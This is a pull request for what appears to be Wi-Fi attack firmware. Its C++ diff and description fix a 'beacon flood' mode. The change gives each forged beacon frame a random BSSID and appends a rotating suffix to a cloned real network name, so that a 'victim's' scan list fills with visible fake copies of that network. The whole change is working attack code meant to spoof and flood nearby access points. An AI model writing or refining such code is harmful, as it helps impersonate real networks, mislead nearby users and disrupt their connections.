### PR TITLE
fix(beacon): Flood mode now spawns visible networks

### DIFF
--- a/firmware/src/screens/wifi/WifiBeaconAttackScreen.cpp
+++ b/firmware/src/screens/wifi/WifiBeaconAttackScreen.cpp
@@ -140,10 +140,16 @@ void WifiBeaconAttackScreen::onUpdate()
         render();
       }
     } else {
+      // Clients dedupe APs by SSID, so flooding the bare target name shows as a
+      // single entry (and merges with the real AP). Append a rotating suffix so
+      // the victim's list fills with visible copies of the selected network.
       for (int i = 0; i < 5; i++) {
+        char ssid[33];
+        snprintf(ssid, sizeof(ssid), "%.28s %02d",
+                 _apList[_floodTarget].ssid, _ssidIdx % 32);
+        _ssidIdx++;
         esp_err_t r = _attacker->beaconFlood(
-          _apList[_floodTarget].bssid, _apList[_floodTarget].ssid,
-          _apList[_floodTarget].channel);
+          _apList[_floodTarget].bssid, ssid, _apList[_floodTarget].channel);
         if (r == ESP_OK) _sentThisSec++;
         vTaskDelay(pdMS_TO_TICKS(1));
       }

--- a/firmware/src/utils/network/WifiAttackUtil.cpp
+++ b/firmware/src/utils/network/WifiAttackUtil.cpp
@@ -120,6 +120,16 @@ esp_err_t WifiAttackUtil::beaconFlood(const uint8_t* bssid, const char* ssid, co
 
   const size_t ssidLen = strnlen(ssid, 32);
 
+  // Flood = many visible copies of the TARGET SSID. Each beacon must carry its
+  // own BSSID, otherwise (reusing the real AP's BSSID) every frame just merges
+  // into the existing network and no new AP ever appears in the victim's scan.
+  // Randomise a locally-administered unicast MAC per call (the passed `bssid` is
+  // only the scan match — its SSID/channel are what we clone).
+  (void)bssid;
+  uint8_t mac[6];
+  for (int j = 0; j < 6; j++) mac[j] = (uint8_t)random(0, 256);
+  mac[0] = (mac[0] & 0xFE) | 0x02;
+
   uint8_t pkt[109];
   size_t  n = 0;
 
@@ -127,8 +137,8 @@ esp_err_t WifiAttackUtil::beaconFlood(const uint8_t* bssid, const char* ssid, co
   pkt[n++] = 0x00; pkt[n++] = 0x00;
   pkt[n++] = 0xFF; pkt[n++] = 0xFF; pkt[n++] = 0xFF;
   pkt[n++] = 0xFF; pkt[n++] = 0xFF; pkt[n++] = 0xFF;
-  memcpy(&pkt[n], bssid, 6); n += 6;
-  memcpy(&pkt[n], bssid, 6); n += 6;
+  memcpy(&pkt[n], mac, 6); n += 6;
+  memcpy(&pkt[n], mac, 6); n += 6;
   const size_t seqOff = n;
   pkt[n++] = 0x00; pkt[n++] = 0x00;
 


### PR DESCRIPTION
`beaconFlood` reused the target's real BSSID, so frames merged into the existing AP and nothing new appeared. Now each beacon uses a random locally-administered BSSID. Clients also dedupe by SSID, so the flood appends a rotating suffix to the target name — the victim's list fills with visible copies of the selected network.